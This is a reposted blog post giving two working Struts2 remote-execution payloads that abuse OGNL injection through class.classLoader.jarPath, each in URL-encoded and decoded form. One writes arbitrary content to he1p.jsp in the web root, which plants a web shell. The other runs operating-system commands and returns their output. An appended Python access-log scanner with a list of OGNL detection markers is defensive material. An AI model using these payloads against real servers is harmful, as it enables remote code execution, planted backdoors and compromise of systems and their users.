Struts2 remote execution vulnerability
First *** method: create a file, put your own content into it, and append &data= followed by the content to be written into the he1p.jsp file
*** address?class.classLoader.jarPath=(
%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean(false)%2C+
%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C+
%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C+
%23sb%3Dnew+java.lang.StringBuffer()%2C+%23sb.append(%23req.getRealPath("/"))%2C+
%23sb.append("he1p.jsp")%2C+%23fos%3Dnew+java.io.FileOutputStream(%23sb.toString())%2C+
%23fos.write(%23req.getParameter('data').getBytes())%2C+
%23darky%3D%40org.apache.struts2.ServletActionContext@getResponse().getWriter()%2C+
%23darky.println("suceessful")%2C+
%23darky.close()%2C+
%23fos.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
Decoded source:
*** address?class.classLoader.jarPath=(
#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
#_memberAccess["allowStaticMethodAccess"]=true,+
#req=@org.apache.struts2.ServletActionContext@getRequest(),+
#sb=new+java.lang.StringBuffer(),+
#sb.append(#req.getRealPath("/")),+
#sb.append("he1p.jsp"),+
#fos=new+java.io.FileOutputStream(#sb.toString()),+
#fos.write(#req.getParameter('data').getBytes()),+
#darky=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),+
#darky.println("suceessful"),+
#darky.close(),+
#fos.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
Second *** method: execute CMD commands
*** address?class.classLoader.jarPath=(
%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean(false)%2C+
%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C+
%23darky%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C+
%23myret%3D%40java.lang.Runtime%40getRuntime().exec("ls -la")%2C+
%23is%3D%23myret.getInputStream()%2C+
%23s%3D+new+java.util.Scanner(%23is).useDelimiter("\\A")%2C+
%23darky.println(%23s.next())%2C+
%23darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
Decoded address
*** address?class.classLoader.jarPath=(
#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
#_memberAccess["allowStaticMethodAccess"]=true,+
#darky=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),+
#myret=@java.lang.Runtime@getRuntime().exec("ls -la"),+
#is=#myret.getInputStream(),+
#s=+new+java.util.Scanner(#is).useDelimiter("\\A"),+
#darky.println(#s.next()),+
#darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
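As an added defender-side example (not code from the original post), the following Python flags access-log requests that tamper with class.classLoader parameters or carry OGNL markers such as the ones in the payloads above, after undoing URL encoding so that the %23/%5B form does not hide them. The marker list and the sample log lines are constructed for illustration and are not a vendor signature.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Markers taken from the payloads shown above; this list is an assumption,
# not a vendor signature, and should be tuned to your own traffic.
OGNL_MARKERS = ("#_memberAccess", "xwork.MethodAccessor.denyMethodExecution",
                "@org.apache.struts2.ServletActionContext@", "@java.lang.Runtime@")
CLASSLOADER_RE = re.compile(r"class\.classLoader", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_fully(text, rounds=3):
    """URL-decode repeatedly so double encoding (%2523 -> %23 -> #) is caught."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect_request(url):
    """Return sorted findings for one request URL; empty list if clean."""
    findings = set()
    query = url.partition("?")[2]
    # parse_qsl already decodes one layer; decode_fully handles the rest.
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = decode_fully(name), decode_fully(value)
        if CLASSLOADER_RE.search(name):
            findings.add(f"classLoader parameter: {name}")
        haystack = (name + value).lower()
        for marker in OGNL_MARKERS:
            if marker.lower() in haystack:
                findings.add(f"OGNL marker: {marker}")
    return sorted(findings)

def scan_log(lines):
    # Yields (client_ip, findings) for every log line whose request is suspicious.
    alerts = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and (findings := inspect_request(match.group(1))):
            alerts.append((line.split()[0], findings))
    return alerts

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2014:10:00:01 +0800] "GET /app/index.action?page=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/May/2014:10:00:07 +0800] "GET /app/index.action?class.classLoader.jarPath=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue)(aa)&x[(class.classLoader.jarPath)(\'aa\')] HTTP/1.1" 200 20',
    '10.0.0.9 - - [01/May/2014:10:00:09 +0800] "GET /app/index.action?q=%2540java.lang.Runtime%2540getRuntime() HTTP/1.1" 200 20',
]
```

The second sample line is the encoded form of the page's payload and the third is double-encoded; both are flagged, while the ordinary request on the first line is not.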
Reposted from: https://blog.51cto.com/abao0918/1439049